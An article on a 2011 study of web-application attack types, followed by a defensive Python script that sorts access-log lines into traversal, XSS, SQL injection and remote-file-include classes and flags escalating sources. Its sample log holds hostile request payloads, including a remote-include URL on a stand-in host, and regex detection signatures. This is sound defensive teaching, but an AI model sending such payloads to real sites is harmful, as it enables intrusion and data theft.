Well, really there are far more, but the latest study from Imperva of 10 million attacks against 30 large organizations from January to May of 2011 cites a cocktail of techniques used by would-be hackers to spot weaknesses and exploit them. For those of us who have tailed a log file spinning out of control during an attack attempt, those numbers seem plausible. Over time, attacks have become slick, automated and often progressive and adaptive, choosing the next phase based on what was found in the last.
To understand a typical hack attempt, visualize a typical commercial office break-in. There may first be a surveillance phase. A second phase then determines which doors are locked. If an unlocked door is found near a machine shop, the thief may adapt the plan to include a truck to haul heavy equipment out during the theft. On the other hand, if the open door is beside an accounting office, a single backpack may be enough to steal an equivalent value. Attacks of the variety we’re talking about here follow similar progressive stages of discovery, adapting as they go to the “terrain” they find and using a different set of tools for each stage.
To apply our analogy to a hack attempt, the first stage is general reconnaissance: getting the lay of the land to see what the hacker may be up against. The second phase attempts to identify potential holes. Depending on the type of information discovered, the hacker then tailors the tool cocktail (and its sequence) to get at what is likely inside. The more popular styles found in Imperva’s study of attacks against Web applications were directory traversal (37%), cross-site scripting (36%), SQL injection (23%) and remote file include (RFI, 4%). Often these were used in combination.
Our goal here isn’t to help you better hack a website. But by understanding the mindset of a thief, you may be able to better assess the weaknesses in your systems and bolster them accordingly. It also underlines the advice to build your systems with a defense-in-depth approach: grant only the least access needed for a given task, and separate functionality so that a breach of a single system doesn’t lead to a breach of another. Defense in depth also helps shed the load of would-be attacks at a perimeter layer before they have a chance to slow down or stop your content servers from functioning as they should.
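To make the four attack classes from the study and the “progressive” pattern concrete from the defender’s side, here is an added example (not part of the original article, and not Imperva’s tooling) that classifies Web-server access-log lines by those four categories and flags source addresses whose requests start out benign and then escalate. The log lines, the regular-expression signatures and the IP addresses are all constructed for illustration; a production rule set would be far larger, but the two design points hold: decode the request target before matching so that percent-encoded variants hit the same rule, and keep per-source history so the recon-then-exploit sequence described above is visible rather than four unrelated alerts.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache-style access log lines (sample data, not from the Imperva study).
# One source probes benign pages first and then sends attack traffic; another goes
# straight to exploitation; a third is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2011:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.5 - - [10/Mar/2011:10:00:02 +0000] "GET /robots.txt HTTP/1.1" 200 55
203.0.113.5 - - [10/Mar/2011:10:00:03 +0000] "GET /images/..%2f..%2fetc/passwd HTTP/1.1" 404 0
203.0.113.5 - - [10/Mar/2011:10:00:04 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 512
198.51.100.7 - - [10/Mar/2011:10:01:00 +0000] "GET /product?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
198.51.100.7 - - [10/Mar/2011:10:01:05 +0000] "GET /page.php?file=http://203.0.113.99/remote.txt HTTP/1.1" 200 0
192.0.2.9 - - [10/Mar/2011:10:02:00 +0000] "POST /login HTTP/1.1" 302 0
"""

# Common log format: ip ident user [timestamp] "METHOD target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Illustrative signatures for the four classes named in the study. They are matched
# against the percent-decoded request target, so %2f, %3c and %27 variants are caught
# by the same rule as their plain forms.
SIGNATURES = {
    "directory_traversal": re.compile(r"\.\.[/\\]"),
    "xss": re.compile(r"<script|javascript:|onerror\s*=|onload\s*=", re.I),
    "sql_injection": re.compile(r"union\s+select|'\s*or\s+'|'\s*or\s+\d", re.I),
    "rfi": re.compile(r"=\s*(?:https?|ftp)://", re.I),
}


def parse_line(line):
    """Return (ip, request target, status) or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("target"), int(m.group("status"))


def classify(target):
    """Return the sorted list of signature names matching a request target."""
    decoded = unquote(unquote(target))  # decode twice to unwrap double-encoded payloads
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def summarize(log_text):
    """Count hits per category and record, per source IP, the sequence of classes seen."""
    counts = Counter()
    by_source = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip malformed lines rather than abort the whole run
        ip, target, _status = parsed
        classes = classify(target)
        counts.update(classes)
        by_source.setdefault(ip, []).append(classes or ["benign"])
    return counts, by_source


def escalating_sources(by_source):
    """Sources whose first request looked benign and which later sent attack traffic:
    the reconnaissance-then-exploit ordering described in the text."""
    result = []
    for ip, stages in by_source.items():
        flat = [c for classes in stages for c in classes]
        if flat and flat[0] == "benign" and any(c != "benign" for c in flat):
            result.append(ip)
    return sorted(result)


if __name__ == "__main__":
    counts, by_source = summarize(SAMPLE_LOG)
    for name, n in counts.most_common():
        print(f"{name:20s} {n}")
    print("escalating sources:", escalating_sources(by_source))
```

Run as a script it prints one hit per category and reports 203.0.113.5 as the escalating source; 198.51.100.7 is not listed because its very first request was already an injection attempt, which is the other pattern worth a separate rule. Feeding a real log through `summarize` is a cheap way to see whether the perimeter layer is actually shedding this traffic before it reaches the content servers.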